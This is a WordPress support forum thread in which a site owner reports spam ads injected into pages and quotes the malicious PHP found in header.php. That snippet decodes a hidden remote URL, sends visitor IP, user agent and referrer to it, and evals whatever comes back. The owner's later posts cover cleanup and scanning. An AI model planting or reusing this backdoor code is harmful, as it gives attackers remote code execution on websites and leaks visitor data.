WordPress.org

Ready to get started?Download WordPress

Forums

Random site pages showing viagra ads and title, meta (5 posts)

  1. soam
    Member
    Posted 2 years ago #

    Im on latest WordPress as always.

    It was all good till date, since 2 years.

    Just today I saw that, few random pages are showing viagra ads in the top of the page .
    That replaced page title, meta data, and then few 20-30 lines with viagra links, etc.

    On searching, I found this on the header.php :

    <?php
    @eval(str_replace(array("\'","\\\\"), array("'","\\"), @file_get_contents(str_replace("{lai}",@urlencode($_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]),str_replace("{ua}",@urlencode($_SERVER['HTTP_USER_AGENT']),str_replace("{ip}",@urlencode($_SERVER['REMOTE_ADDR']),str_replace("{hr}",@urlencode($_SERVER['HTTP_REFERER']),@base64_decode("aHR0cDovLzk1LjE2OC4xNzguMjA3L3p4Y3Zibm0vc3J2MTcyNi9zdGF0dXNTZXJ2ZXJTaWRlLnBocD9saW5rQXNJcz17bGFpfSZ1YT17dWF9JmlwPXtpcH0maHI9e2hyfSZ2ZXI9Mg=="))))))));
    ?>

  2. soam
    Member
    Posted 2 years ago #

    I fixed it by removing from header.php , but how can someone place this in my file ?

  3. esmi
    Forum Moderator
    Posted 2 years ago #

  4. soam
    Member
    Posted 2 years ago #

    I know.
    I have already changed logins and removed the code.

    Do I need to take any other step ?

  5. soam
    Member
    Posted 2 years ago #

    Ok I just scanned the site on Sucuri and its clean.

    Just one thing.

    See screenshot :

    http://d.pr/1mZ2

    What it says about my internal path ?

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags